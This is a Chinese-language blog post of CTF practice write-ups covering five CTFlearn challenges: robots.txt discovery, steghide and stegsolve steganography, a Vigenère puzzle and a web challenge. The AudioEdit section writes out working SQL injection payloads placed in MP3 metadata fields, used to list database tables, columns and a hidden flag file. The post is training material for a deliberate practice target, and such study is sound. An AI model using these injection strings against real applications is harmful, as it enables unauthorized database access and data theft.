CTF校队暑期练习2021.6.25
CTF题目 June. 25th 2021
[Easy] [Web] Where Can My Robot Go?
Where do robots find what pages are on a website?
https://ctflearn.com/challenge/107
Hint:
What does disallow tell a robot?
题面指robots.txt文件。
访问https://ctflearn.com/robots.txt,显示“Disallow: /70r3hnanldfspufdsoifnlds.html”。
访问https://ctflearn.com/70r3hnanldfspufdsoifnlds.html得到flag。
[Easy] [Forensics] Simple Steganography
Think the flag is somewhere in there. Would you help me find it?
Hint-" Steghide Might be Helpfull"
下载下来一张图:
用sudo apt install steghide安装steghide。
查看文件EXIF信息,有提示“关键词myadmin”。
用steghide extract -sf 图片查看隐写的信息,要求输入密码,为“myadmin”。
执行完毕后生成一个raw.txt,里面的字符串用base64解密后得到flag。
[Medium] [Miscellaneous] Ambush Mission
Hi, i can’t tell you my name since now i’m in a mission. In case to arrest our fugitive target, our team had been intercepted communication between the target with his fellow and found this image (https://mega.nz/#!TKZ3DabY!BEUHD7VJvq_b-M22eD4VfHv_PPBnW2m7CZUfMbveZYw). It looks like they are going to meet in specific place, but we still don’t know the time yet. Can you help me?
下载下来一张图:
用wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar下载stegsolve。
用Stegsolve打开图片,按>键直到Red plane 0,显示出一行字符串,逆转后Base64解码即为flag值。
P.S. 要注意字符串中,有几个难分清字符可能要尝试多次,大写i和小写L,大写o和数字0。
[Hard] [Cryptography] The Simpsons
Ya know, I was thinking… wouldn’t the Simpsons use octal as a base system? They have 8 fingers…
Oh, right! The problem! Ummm, something seems odd about this image…
https://mega.nz/#!yfp1nYrQ!LOz_eucuKkjAaDqVvz3GWgbfdKWn8BhussKZbx6bUMg
下载下来一张图:
发现文件的二进制数据结尾有一段神似Python的代码:
|
|
先把两个字符串转成八进制看看:
|
|
得到输出:
jrjerwhzkrexar
How much did Maggie originally cost? (Divided by 8, to the nearest integer, and then plus four)
搜一下第二个问题,是$847.63。
再运行:
|
|
算得key是nnj。
最后看题解,知道是Vigenère加密。
用CyberChef的”Vigenère Decode”功能解密,得到flag的内容。
[Hard] [Web] AudioEdit
I made this cool site for editing audio files. Can you exploit it?
随便传一段小于1mb的mp3文件,发现会显示“Author”和“Title”两个信息,这两个信息来自上传的mp3文件详细信息“参与创作的艺术家”和“标题”,且均会去掉最后一个字符。
重复上传文件,发现提示文件已经存在,所以文件应该是存在某处的。
将作者改为a', 'aa') -- -; ,标题改为b', 'bb') -- -;,发现Author变为a,Title变为aa。猜测有类似insert into database (..., author, title, ...) values (..., author_value, title_value, ...);数据库插入语句,且author在title的前面。
将作者改为a', (select group_concat(table_name) from information_schema.tables WHERE table_schema=database())) -- - ,得到表名为audioedit。
将作者改为a', (select group_concat(column_name) from information_schema.columns WHERE table_name='audioedit')) -- -得到列有id、file、author和title。
将作者改为a', (select group_concat(file) from audioedit as tmp)) -- -,发现有一个文件名为supersecretflagf1le.mp3。
使用链接https://web.ctflearn.com/audioedit/supersecretflagf1le.mp3下载该mp3文件。
上传,然后将Visualisation滑动条拉到最右边,就能看见flag了。
- Author: HuaHuaY
- Link: https://www.huahuaorz.com/post/CTF%E6%A0%A1%E9%98%9F%E7%BB%83%E4%B9%A0/CTF%E6%A0%A1%E9%98%9F%E6%9A%91%E6%9C%9F%E7%BB%83%E4%B9%A02021.6.25/
- License: This work is under a 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议. Kindly fulfill the requirements of the aforementioned License when adapting or creating a derivative of this work.